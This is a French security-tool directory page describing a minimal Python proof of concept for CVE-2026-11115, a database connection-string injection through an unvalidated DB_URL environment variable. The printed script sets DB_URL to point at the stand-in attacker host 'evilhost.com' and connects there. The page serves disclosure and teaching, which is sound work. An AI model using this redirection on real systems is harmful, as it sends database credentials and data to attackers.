Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-11115-Database-Connection-String-Injection-via-Env-Variable — Preuve de concept Python minimale pour CVE-2026-11115, démontrant l'injection de chaîne de connexion de base de données via des variables d'environnement et la redirection vers des hôtes PostgreSQL contrôlés par l'attaquant. | Kitploit
Outils/GitHubGitHub/george0papasotiriou/cve-2026-11115-database-connection-string-injection-via-env-variable
Analyse des VulnérabilitésExploitationTests d'IntrusionMauvaise ConfigurationApprentissage et ÉducationSécurité des Bases de Données
GitHubgeorge0papasotiriou/cve-2026-11115-database-connection-string-injection-via-env-variable

CVE-2026-11115-Database-Connection-String-Injection-via-Env-Variable

Preuve de concept Python minimale pour CVE-2026-11115, démontrant l'injection de chaîne de connexion de base de données via des variables d'environnement et la redirection vers des hôtes PostgreSQL contrôlés par l'attaquant.

Voir le dépôt
5il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-11115 – Injection de chaîne de connexion à la base de données via une variable d'environnement

Code du programme (Python)

root@kitploit:~
# db_connector.py - Constructs DB connection string from environment
import os, psycopg2

def connect():
    # Reads DB_URL; attacker can override via environment injection if they control an env var
    db_url = os.getenv('DB_URL', 'postgresql://user:pass@localhost/db')
    # Vulnerability: no validation; allows extra parameters like ?application_name=... but also SSRF or auth bypass
    conn = psycopg2.connect(db_url)
    return conn

# Simulate an attacker who can set environment variable:
os.environ['DB_URL'] = "postgresql://user:pass@localhost/db?host=evilhost.com&sslmode=disable"
c = connect()  # Connects to attacker-controlled host!
print("Connected to attacker DB.")

CVE-2026-11115 – Injection de chaîne de connexion à la base de données

Severity: High

Vue d'ensemble

Une application construit sa chaîne de connexion à la base de données à partir d'une variable d'environnement sans validation. Si un attaquant peut influencer cette variable (par exemple, via une falsification de requête côté serveur ou une mauvaise configuration du pipeline CI/CD), il peut rediriger la connexion à la base de données vers son propre serveur, interceptant ou modifiant les données.

Détails de la vulnérabilité

  • Type: Injection de chaîne de connexion
  • Impact: Exfiltration de données, homme du milieu.
  • Cause racine: L'URI de connexion complète est tirée d'une variable d'environnement, et des paramètres supplémentaires (comme host) peuvent être ajoutés pour remplacer l'hôte d'origine.

Démonstration de l'exploitation

Exécutez la simulation :

root@kitploit:~
pip install psycopg2-binary
python db_connector.py

Le programme tente de se connecter à evilhost.com au lieu de localhost.


Télécharger l’outil